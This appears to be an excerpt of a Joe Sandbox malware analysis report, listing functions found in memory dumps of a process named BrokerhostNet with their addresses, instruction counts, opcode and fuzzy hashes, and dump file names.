Opcode ID: 1026f34dc4352cc7706455ce03662e36c268513b0b695369d1859b97dedaf4a7
Instruction ID: 576d0d707af9f6a705553e19c240c933f27c727dec5f7c0b99481f0b23cfea86
Opcode Fuzzy Hash: 1026f34dc4352cc7706455ce03662e36c268513b0b695369d1859b97dedaf4a7
Instruction Fuzzy Hash: F631A430A0D64E8FDB59EBA8C8649B97BF0FF56310B0945FBC049D71A2DA78A941CB40

Function 00007FFD9BAC0C25 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 316ad2cb8a42930c42f57dd019d6858f00d45be6cf2e36029d288fd3ef038c28
Instruction ID: 08f337dbe77e9e1d8592dd5c1456846492dcc23ceff04a39b73b4e6482962b86
Opcode Fuzzy Hash: 316ad2cb8a42930c42f57dd019d6858f00d45be6cf2e36029d288fd3ef038c28
Instruction Fuzzy Hash: 3221E931A0D68D8FE732EBA888652EC7FA0EF52325F1541F7D0449B1E3DA782645CB45

Function 00007FFD9BAC1DD2 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a32f66480f91fa5da865d50412e23144f8395eabb2ba59d158ef835f735d038c
Instruction ID: b884aac7efc01c962d2e5134026f41567cfae780bb138f86aa5e8f05d39290ed
Opcode Fuzzy Hash: a32f66480f91fa5da865d50412e23144f8395eabb2ba59d158ef835f735d038c
Instruction Fuzzy Hash: 75115132B0D90D4FEBB4B75898656F86392EF94320F5201B7D40EC31B2DE69AE424685

Function 00007FFD9BAF2381 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e34d99af1a31c93d98931696c1b54e4d009a70cc560a776d048c61573b06640
Instruction ID: 2b8b654ef14b11d9675cebe9d53a443886cf7d8799ec55fdf914817066ed19d1
Opcode Fuzzy Hash: 7e34d99af1a31c93d98931696c1b54e4d009a70cc560a776d048c61573b06640
Instruction Fuzzy Hash: 4421D135B09B5A8BE76CEB88C4A4BF477A1EF58314F454279E009CB2E2CE6C7D448B41

Function 00007FFD9BAC0C38 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cb9f48ea5d08f55dc9a10fc3f8eb73bd4e1b2b0154d01ab5642d114ffb3ec79
Instruction ID: c09e71df8a1b1a4869cf386a8397718c97d013f9b857258ef1add1fd2400058a
Opcode Fuzzy Hash: 5cb9f48ea5d08f55dc9a10fc3f8eb73bd4e1b2b0154d01ab5642d114ffb3ec79
Instruction Fuzzy Hash: 5211A335A0E68D8FE722EB6888602EC7FB0EF52611F0646F7D084DB1A2D57416058B81

Function 00007FFD9BAC57D9 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd3a11cbf25539dd354ecb5845e79f11968ea4c95f6e27ac8d11f2e798bb8947
Instruction ID: c90a4849ebbbd1eeae7592af8642125c5aa7652068d418ad34d7154c1656ee93
Opcode Fuzzy Hash: cd3a11cbf25539dd354ecb5845e79f11968ea4c95f6e27ac8d11f2e798bb8947
Instruction Fuzzy Hash: 69012511F1A91D4BFAB4BBA8807527C12C1EF68750F564075D40DD32E2EC6C6E024345

Function 00007FFD9BAFD797 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e30041cfbef35fa63167e35b92f7d411aac5e4174f219e113595ff630c88ae9
Instruction ID: c4ff8c011f130c3925393df12da1b353f5fe56896d7a52f6640c0483419d6312
Opcode Fuzzy Hash: 1e30041cfbef35fa63167e35b92f7d411aac5e4174f219e113595ff630c88ae9
Instruction Fuzzy Hash: 8701D431F0961E8BEF64E668D8553FDB3E1EF54351F010636D01DDB190CA68AA408B80

Function 00007FFD9BAC0C40 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 234dec9cafd74fcc0d508f24aec88a8fe019a32f5bf66754790e470be757bc8e
Instruction ID: 9197c9a1594a8aaefe37cb0dbc5f38dec22d88e415b2d25d9202225cefc19fdd
Opcode Fuzzy Hash: 234dec9cafd74fcc0d508f24aec88a8fe019a32f5bf66754790e470be757bc8e
Instruction Fuzzy Hash: D001A135A0E78C8FE722EB68C8602ED7FB0EF52210F0646E7D080DB1A2D5341648CB81

Function 00007FFD9BAC0C48 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faacb5ca0d5bf85715ddd4a7b53487fb43c5cb9e0fe9430aa23664885d106101
Instruction ID: 81581d82fba9c902789125040fcd1c3aed4123829f21aa5a128663b56bfc41c9
Opcode Fuzzy Hash: faacb5ca0d5bf85715ddd4a7b53487fb43c5cb9e0fe9430aa23664885d106101
Instruction Fuzzy Hash: 54019235A0E38C8FD722EB64C8502DC7FB0AF02314F1541E7D080DB1A2D5345744CB81

Function 00007FFD9BAF79ED Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a50eaba5d0fbba4e40dba3a536c497b2d6a56aa58f8f3196fab881c8a7e5c26b
Instruction ID: f488e3e08a37a62a34a619725f30b0d31f9e8e8b36467914b20e8f9a10bd3f17
Opcode Fuzzy Hash: a50eaba5d0fbba4e40dba3a536c497b2d6a56aa58f8f3196fab881c8a7e5c26b
Instruction Fuzzy Hash: 88F06F62A0E7CA6FC31B0B3488654A03F70AE2B21134E00E3D086CF5B3D959AC4A8362

Function 00007FFD9BAC0C50 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 558aecef8515b7681ddc15e0e94d54af5c17797132f8f03e762ab50f4a43160e
Instruction ID: 62ca864d798a202b9a8f0ed953128998cf72a14bd19b7ea5a345f97c00267408
Opcode Fuzzy Hash: 558aecef8515b7681ddc15e0e94d54af5c17797132f8f03e762ab50f4a43160e
Instruction Fuzzy Hash: 5D018F35A0E3898FE722EBA488A02ED7FB0AF02314F1541E7D480DB2A7D5785B44C741

Function 00007FFD9BAC1E30 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction ID: 5b2d37ca4b4ee0ed228b7184c73283abff8308722cde694b570618cbc4da2a14
Opcode Fuzzy Hash: 0c1cbc2d5aba2662984849389d2296d18026686e50eed8c25836081bc0afd78d
Instruction Fuzzy Hash: F7F01D31B0940E8BEB74BB84C8647F86361AB54311F1602B6C40ED32A1DEB86A818B44

Function 00007FFD9BAC0B77 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dabe090550f6abe9d5b5cddb9203ea850b373cdf38cc6999b82ac068db81100
Instruction ID: 884c626417feed194adc19ed2f0f23e37b2aaf725ec9f3e377ee3c5324746a63
Opcode Fuzzy Hash: 5dabe090550f6abe9d5b5cddb9203ea850b373cdf38cc6999b82ac068db81100
Instruction Fuzzy Hash: B3F02B3525F648CFC701EB38DCA54D47F60FF43214B8A12FAC489C7562C215585ECB40

Function 00007FFD9BAFBD4D Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b483c73932112d7d09d52af223c4e102b8132904acbd4709962d3000c05231be
Instruction ID: be10092ead80b0688915004bdf884b31b0a863e68029cdaa67f8888931f36a7f
Opcode Fuzzy Hash: b483c73932112d7d09d52af223c4e102b8132904acbd4709962d3000c05231be
Instruction Fuzzy Hash: 48E0E501B0F6894FE73963B928774E8BF50AF05220FC601FAE4488B1E7EC5D198A0346

Function 00007FFD9BAD3FF1 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bad0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b697fb5a35fddfd12fa4a816bfa2e5ef0d4385966dd15c797148feaf86aa25a0
Instruction ID: b0ce164cc0484993d8cfe41841bd57afde0c402828dff04f398df4e27b39cddd
Opcode Fuzzy Hash: b697fb5a35fddfd12fa4a816bfa2e5ef0d4385966dd15c797148feaf86aa25a0
Instruction Fuzzy Hash: 83F05471A0991E8FEB54EB48CC686BD73F2FB94314F00033AD41ADB2E4DEB469448B80

Function 00007FFD9BAD6E78 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bad0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ae05e4ed85f419e8dc22de686fe8e1e28b6598be457c91f375aa773dd880588
Instruction ID: 5aa11c3ff8b805acef2f72ff7086cb6657315db8cbd591c441c9bb217b1d47a4
Opcode Fuzzy Hash: 0ae05e4ed85f419e8dc22de686fe8e1e28b6598be457c91f375aa773dd880588
Instruction Fuzzy Hash: 97F0DA31A1995D8FEBE4EB1CC865AA972E1FF98300F1502B9D44DC72A2DE24AD458B41

Function 00007FFD9BAD49DA Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bad0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 747a4374f31cd01b002434202d3caaa6a78ba1dd587befa589e2998a1c933a8a
Instruction ID: 39eadad93e85b6bd31fdeac4e0854b534c8f8e690e23a285a698075c45317405
Opcode Fuzzy Hash: 747a4374f31cd01b002434202d3caaa6a78ba1dd587befa589e2998a1c933a8a
Instruction Fuzzy Hash: 25F0A030B0D54E4BEB29EF88D8A01BA7360EB84300F118379C45E831F6DE68AA028680

Function 00007FFD9BAE91C9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bae1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d906b9d895c1cb56ca8ae84139ffa80eac47486cc4e03720a052405c889aaedc
Instruction ID: a81ae1a6e97947cef1212dc5d1d0a68fc5b02b0fedb0e137746a4985ba063aa3
Opcode Fuzzy Hash: d906b9d895c1cb56ca8ae84139ffa80eac47486cc4e03720a052405c889aaedc
Instruction Fuzzy Hash: 9EE01221A0AB844FC70AA6388C699503FB1EA6B21278A00DBD045CB2B3E619DC88C712

Function 00007FFD9BAF1BF9 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 339e9c1539ee0d1fec1be6bea947b40954ea0a400189ab2ed01d59638e92bd9e
Instruction ID: 017a938670fa2c0e75807fa6c574a4b72af62ad2dd63c9b5133c146c7b36dd67
Opcode Fuzzy Hash: 339e9c1539ee0d1fec1be6bea947b40954ea0a400189ab2ed01d59638e92bd9e
Instruction Fuzzy Hash: 1FE0927160E3C48FCB16EB3484689547FA0EE6720174A42EEC886CF1A7EA2DC886C711

Function 00007FFD9BAF2E59 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e247cf040982cca71b2f292c1ff98a5a5912dabd4079e646bb6c6b4c8d3f9c6b
Instruction ID: 2b0d870d49115b5f1a0be62fe55ce1d1f2ff99375934f42046581d01f6da6def
Opcode Fuzzy Hash: e247cf040982cca71b2f292c1ff98a5a5912dabd4079e646bb6c6b4c8d3f9c6b
Instruction Fuzzy Hash: A1E0927064E3C44FC71AEA748869855BF70EF6B20134A42EFC045CF2A7EA2DC889CB01

Function 00007FFD9BAF79B9 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f35c0bd866515851c56287451d6ddcde8e1d94afd3bfd77f291f4d72a6bf1ef3
Instruction ID: bbc5ae42243c53c6d1cc379f3365f401309f747e3a523433f6c19442aba1f056
Opcode Fuzzy Hash: f35c0bd866515851c56287451d6ddcde8e1d94afd3bfd77f291f4d72a6bf1ef3
Instruction Fuzzy Hash: 79E04F3294F7C04FCB4B9B3588A88843F71EF1721074A41EAC085CF5B3EA199C4AC701

Function 00007FFD9BAC6000 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2a07df2833f395d68356c7460e240cf71c0c7e13d2cc5ab9b5ab118de2d03c
Instruction ID: 46bc06708d7c8314a9ba328e322a99391b5a29b1937502e2166e995d89950f30
Opcode Fuzzy Hash: ab2a07df2833f395d68356c7460e240cf71c0c7e13d2cc5ab9b5ab118de2d03c
Instruction Fuzzy Hash: 8EF04534518E18CFCB59EF48C8A9AA9B7F1FBA8305F110199D04AEB360CB31AA44CF45

Function 00007FFD9BAD46D2 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bad0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c96ec6c58c20190858fc2a4978d57ac48c87cbbc4bf85c43ccdabed87cbd86c2
Instruction ID: b2cd3ee9020e551b35eaf58eebec81d78dd8f6fd3e9f803c728ca68dabfc6aeb
Opcode Fuzzy Hash: c96ec6c58c20190858fc2a4978d57ac48c87cbbc4bf85c43ccdabed87cbd86c2
Instruction Fuzzy Hash: E7E01A22B0D80E46E766A75488645BA3292ABE0318B160339C01A831A1EDACA6028640

Function 00007FFD9BAE9019 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bae1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1e240d15590448b79d64931ea8615edf870c79cd522b6a203e3610e822f6b15
Instruction ID: 0fb42fc601149782f72e56665e05278a252af14e2b211aeba9d67739c13335bc
Opcode Fuzzy Hash: f1e240d15590448b79d64931ea8615edf870c79cd522b6a203e3610e822f6b15
Instruction Fuzzy Hash: 3FE01A7054A3C04FCB06AB7488A99443FB09E6B21078E41DEC049CF1B3D62D8949C701

Function 00007FFD9BAC6FE4 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction ID: 03183f59e12cfa4b9bcb0a42e0d52873d709c7230d9d84f205269dc2663c1923
Opcode Fuzzy Hash: 51fb474dd7bb686211c8e5165feaf6390a4736746e3a3fcf820c2695512cc747
Instruction Fuzzy Hash: 2BE01220F0D41A46FBB4B344D8A17BD6261DB54310F1550B9E94EE33D1DD78AF858705

Function 00007FFD9BAFA200 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAF7E49 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48a5b6089f240c0442d393009cb08e861f793e7f9722bd56c80b7448b36eb344
Instruction ID: c3723b75fef6caa2a584792bc1162f3a7536e545b20a8587342d7d6d52fb3e17
Opcode Fuzzy Hash: 48a5b6089f240c0442d393009cb08e861f793e7f9722bd56c80b7448b36eb344
Instruction Fuzzy Hash: 6FE01A6154F3C44FCB06EB7488A98447FA09E6B21078A40EEC145CF1B3E62D8849C701

Function 00007FFD9BAFD979 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbb2e7e8a08bf08a67a44ed6f47d4f99d75b07158a14a740d0e800bb2222713
Instruction ID: 0b0a48e4a858e2186a81d0d9fe8bcc4c6960e96ee9f8068f5f1fbee809a9af6b
Opcode Fuzzy Hash: fcbb2e7e8a08bf08a67a44ed6f47d4f99d75b07158a14a740d0e800bb2222713
Instruction Fuzzy Hash: D5E04F2154E3C44FC70B973488688903F609E1721074A40EBC145CF2B3E5298C49C711

Function 00007FFD9BAFA170 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80

Function 00007FFD9BAF3CB9 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c132de5b89aac262cf4e35fee29991f7e6937cf5792d3974664b6b365725847
Instruction ID: 20a62cbd0a618996e326e2aef8d09154ebc2857814b93a66979a05e74bec3dd4
Opcode Fuzzy Hash: 8c132de5b89aac262cf4e35fee29991f7e6937cf5792d3974664b6b365725847
Instruction Fuzzy Hash: 2EE01A6154E3C44FCB0AEB7488698547F60AE6B21078A41EEC145CF1B7E62D8849C701

Function 00007FFD9BAFD8F9 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff44dba98020fef4b3c3e64df86fcd324d1043a0d4e2cb8fcb8aaeae2f89a0e1
Instruction ID: 330eb2066f548c51af66d6f2d6e6aeca2d66f4fc219110031a576cb94dfd42b0
Opcode Fuzzy Hash: ff44dba98020fef4b3c3e64df86fcd324d1043a0d4e2cb8fcb8aaeae2f89a0e1
Instruction Fuzzy Hash: 02E0462194E7C44FC70B9B3088A88943F609E2B21078A80EFC185CF2B3EA298849C702

Function 00007FFD9BAF3CD0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9BAF1CA0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741

Function 00007FFD9BAFB738 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 415f7d0de073e2668e6d5afe974929b12247d147b0922ce743488fbb5b2e585e
Instruction ID: c70cbb9c14f04017f50c66b4c317e0dbd6ac9cab59e25dbf4b53ff9fdae7e94b
Opcode Fuzzy Hash: 415f7d0de073e2668e6d5afe974929b12247d147b0922ce743488fbb5b2e585e
Instruction Fuzzy Hash: 61D02230B509040FC70CAB3888988743390EB6A20278100ACE00AC72B1D96ADD88C740

Function 00007FFD9BAF6EB8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAF1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9baf1000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbac5bbe0f9845df4f896b453c18e20627ba7236deb0cecb516c00358431886
Instruction ID: 044dcf55a00901323c3c14a8e1cb83b8334c49f71fdbe5a8e0c0bd462fe8c9f2
Opcode Fuzzy Hash: fcbac5bbe0f9845df4f896b453c18e20627ba7236deb0cecb516c00358431886
Instruction Fuzzy Hash: 1FD01234B519044FC71CE73CC8998787791EB6A216B9540A9D00AC72B1D96ADD89C741

Function 00007FFD9BAC06AD Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.2300489833.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ffd9bac0000_BrokerhostNet.jbxd

Similarity

API ID:
String ID:
API String ID:
